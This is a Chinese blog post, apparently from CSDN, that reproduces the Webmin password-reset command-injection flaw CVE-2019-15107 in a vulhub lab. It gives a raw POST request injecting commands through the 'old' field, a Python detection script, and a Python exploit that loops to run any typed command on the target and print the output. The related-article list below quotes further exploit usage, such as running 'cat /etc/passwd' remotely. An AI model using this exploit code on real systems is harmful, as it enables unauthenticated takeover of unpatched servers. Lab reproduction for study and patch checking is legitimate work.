Webmin 远程命令执行漏洞(CVE-2019-15107)复现,python编写POC和EXP

最新推荐文章于 2022-10-02 14:47:38 发布
最新推荐文章于 2022-10-02 14:47:38 发布
阅读量470 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: python 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/120591837
版权

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost CVE-2019-15107]# cd /home/vulhub/webmin/CVE-2019-15107/
[root@localhost CVE-2019-15107]# docker-compose up -d

查看端口:

[root@localhost CVE-2019-15107]# docker ps
CONTAINER ID   IMAGE                 COMMAND                  CREATED         STATUS         PORTS                                           NAMES
a6c80145477b   vulhub/webmin:1.910   "/docker-entrypoint.…"   6 minutes ago   Up 6 minutes   0.0.0.0:10000->10000/tcp, :::10000->10000/tcp   cve-2019-15107_web_1

漏洞复现:

执行完成后,访问https://your-ip:10000,忽略证书后即可看到webmin的登录页面。
参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况下(而参考链接中是user=root),才会进入到修改/etc/shadow的地方,触发命令注入漏洞。

发送如下数据包,即可执行命令id:

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=wwwq&pam=&expired=2&old=test|id&new1=test2&new2=test2

在这里插入图片描述

POC编写:

import requests


requests.packages.urllib3.disable_warnings() #去除告警

url = "https://192.168.10.10:10000/password_change.cgi"



headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": f"{url}", "Content-Type": "application/x-www-form-urlencoded"}

data = {"user": "wwwq", "pam": '', "expired": "2", "old": "test|echo wwwq|md5sum", "new1": "test2", "new2": "test2"}
#  data  中执行的   echo wwwq|md5sum  命令

res = requests.post(url,  data=data,headers=headers, verify=False)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text:   #   wwwq 的 md5 值
    print("CVE-2019-15107 存在")

pycharm运行结果:
在这里插入图片描述

EXP编写:

import requests,re


requests.packages.urllib3.disable_warnings() #去除告警

url = "https://192.168.10.10:10000/password_change.cgi"



headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": f"{url}", "Content-Type": "application/x-www-form-urlencoded"}

data = {"user": "wwwq", "pam": '', "expired": "2", "old": "test|echo wwwq|md5sum", "new1": "test2", "new2": "test2"}
#  data  中执行的   echo wwwq|md5sum  命令

res = requests.post(url,  data=data,headers=headers, verify=False)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text:   #   wwwq 的 md5 值
    print("CVE-2019-15107 存在")

    while 1 :
        data["old"] = "test|" + input("请输入你要执行的命令:")   # 输入要执行的命令且替换 data 中的执行的命令

        exp_res  = requests.post(url,  data=data,headers=headers, verify=False)
        rce_res = re.findall("incorrect([\s\S]*)</h3>",exp_res.text)  # 正则提取结果
        print(rce_res[0])

pycharm运行结果:
在这里插入图片描述

~王
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2019-15107
05-23
CVE-2019-15107 CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞Python实现 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的代码只能用于学术/道德目的。 作者不容忍将此漏洞利用用于任何其他目的-只能将其用于您拥有的或已被授予测试访问权限的系统。
webmin远程命令执行漏洞(cve-2019-15107)深入分析
whatday的专栏
06-27 2179
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞分析 首先分析msf给出的插件 根据插件,还原出poc如下: 当poc执行后,会向p.
Webmin未经身份验证的远程代码执行CVE-2019-15107
m0_58606546的博客
01-11 3093
0x01 漏洞详情 Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下执行恶意代码,后经知道创宇404实验室发现,该漏洞的存在实则是sourceforge上某些版本的安装包和源码被植入了后门导致的。 0x02 影响版本 webmin<=1.920 0x03 漏
CVE-2019-15107 Webmin远程命令执行漏洞复现 (文末EXP
Vitaminapple的博客
06-03 1020
CVE-2019-15107 Webmin远程命令执行漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y inst
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
wireshark抓包(Webmin 远程命令执行漏洞CVE-2019-15107))
10-12
wireshark抓包(Webmin 远程命令执行漏洞CVE-2019-15107))
better-authentic:Webmin Authentic 主题的改进版本
06-03
使主题完全支持所有Webmin/Usermin模块 尽可能美观、快速、轻便且易于使用 兼容所有平台,支持移动设备 ####特征 未经身份验证的用户登陆登录页面和用户成功登录时的邮件通知 桌面和移动版本前所未有的方便和...
PyKota Webmin Module:PyKota Webmin模块-开源
05-08
PyKota Webmin模块是专为Webmin设计的一款开源组件,其主要功能是提供对PyKota打印机计费服务器的配置和管理支持。在深入探讨这个模块之前,我们首先需要理解Webmin和PyKota的基本概念。 Webmin是一款强大的基于Web...
Vulfocus--->webmin 远程代码执行CVE-2019-15642)
weixin_63124284的博客
10-02 561
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。
漏洞复现-webmin漏洞系列分析与利用
aming小老弟
05-18 2620
webmin远程命令执行漏洞目标简介漏洞描述漏洞利用条件:漏洞复现构造POC构造EXP漏洞分析被植入后门依据修复建议 目标简介 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。 使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 L
漏洞复现------Webmin 远程命令执行漏洞CVE-2019-15107
Z_Grant的博客
09-23 7449
文章目录一,webmin简介二,漏洞概述三,漏洞复现(1)环境搭建(2)exp四,漏洞分析五,漏洞修复 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
Webmin 远程命令执行漏洞CVE-2019-15107
Beret-81的博客
06-12 654
Webmin 远程命令执行漏洞CVE-2019-15107漏洞描述:影响版本:环境搭建:漏洞利用: 漏洞描述: Webmin是一款功能强大的基于Web的系统管理工具,被广泛应用于Unix系统,由于Webmin中Password_Change.cgi在接收请求的处理过程中,old参数存在命令注入漏洞,可被攻击者恶意利用。当用户开启Webmin密码重置功能后,攻击者利用该漏洞可在易受损系统中执行任意命令,进而获取系统Shell。 影响版本: Webmin 1.920及以下版本 环境搭建: 环境搭建:http
CVE-2019-0708漏洞复现EXP利用)
CSD15138668634的博客
09-09 1396
2019年5月15号Windows发布补丁,该补丁修复了远程桌面中存在的远程代码执行漏洞CVE-2019-0708,该漏洞通过检查用户的身份验证,绕过认证,可直接通过rdp协议进行连接并发送恶意代码。一旦被利用会导致服务器入侵,可造成像WannaCry永恒之蓝漏洞一样大规模的感染。 2019年9月7日凌晨,metaspolit更新了漏洞利用程序,可远程代码执行获取系统权限。 0x01环...
weblogic反序列化漏洞复现CVE-2019-2725)
千寻的博客
12-02 5011
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞存在复现第一步 访问控制台第二步 使用weblogicScan进行扫描,发现存在该漏洞漏洞复现一(poc执行命令:上传webshell漏洞复现二下载地址漏洞检查命令执行上传哥斯特马,并进行连接哥斯特与msf联动免责声明 漏洞名称 weblogic反序列化远程命令执行漏洞 漏洞编号 CVE-2019-2725 漏洞描述 CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞, 这个漏洞依旧是根据weblogic的xm
CVE-2022-36446 Webmin命令注入漏洞复现
热爱学习,喜欢折腾!
08-15 3621
Webmin是一款功能强大的基于Web的Unix系统管理工具,管理员可以通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。近日,Webmin被披露存在一个任意命令注入漏洞CVE-2022-36446),其CVSS评分为9.8,目前该漏洞PoC/EXP已公开。Webmin版本1.997之前,由于缺乏输入清理,导致可以注入将连接到包管理器调用的任意命令。经过身份验证且有权访问软件包更新模块的用户可以通过在新软件包安装期间执行 OS 命令注入实现在系统上以 root 权限运行命令。........
编写Poc:Yapi远程命令执行漏洞
soldi_er的博客
07-12 881
文章目录使用Docker构建Yapi(Ubuntu环境)访问yapi镜像,测试漏洞自动化探测脚本FOFA批量探测(python3)单url探测(python2)参考 使用Docker构建Yapi(Ubuntu环境)   (1)创建mongoDB数据卷: docker volume create mongo_data_yapi   (2)启动MongoDb docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo   (3)从阿里
ThinkPHP5 5.0.23 远程代码执行漏洞复现python编写POCEXP
wangqiao258的博客
10-05 1404
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost ~]# cd /home/vulhub/thinkphp/5.0.23-rce/ [root@localhost 5.0.23-rce]# docker-compose up -d 查看端口: [root@localhost 5.0.23-rce]# docker ps CONTAINER ID IMAGE COMMAND CREATED
HACK学习黑帽子Python--Gitlab远程代码执行(CVE-2021-22205)脚本构造Poc
qq_29437513的博客
12-06 1558
前言: 作为一名白帽,写脚本能快速的在挖洞过程中快速的批量验证。 为了让笔记更有实用性,这里以poc的形式: Gitlab由于文件解析器对上传的dvju格式的jpg文件校验不严,导致远程代码执行RCE, Poc利用链: 01.获取"/users/sign_in"页面的session,得到返回包的X-CSRF-Token, 02.利用’X-CSRF-Token’ 请求"/uploads/user" 上传页面, 03.构造带有dnslog命令poc图片 dnglog_cmd = "curl whoami.xX
cve-2015-20107漏洞修复
最新发布
12-08
根据引用[1]和引用提供的信息,CVE-2019-15107webmin系统存在的RCE漏洞编号。为了修复该漏洞,需要升级webmin版本至1.930或以上。具体修复步骤如下: 1.登录webmin系统,进入“Webmin Configuration”页面。 2.在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值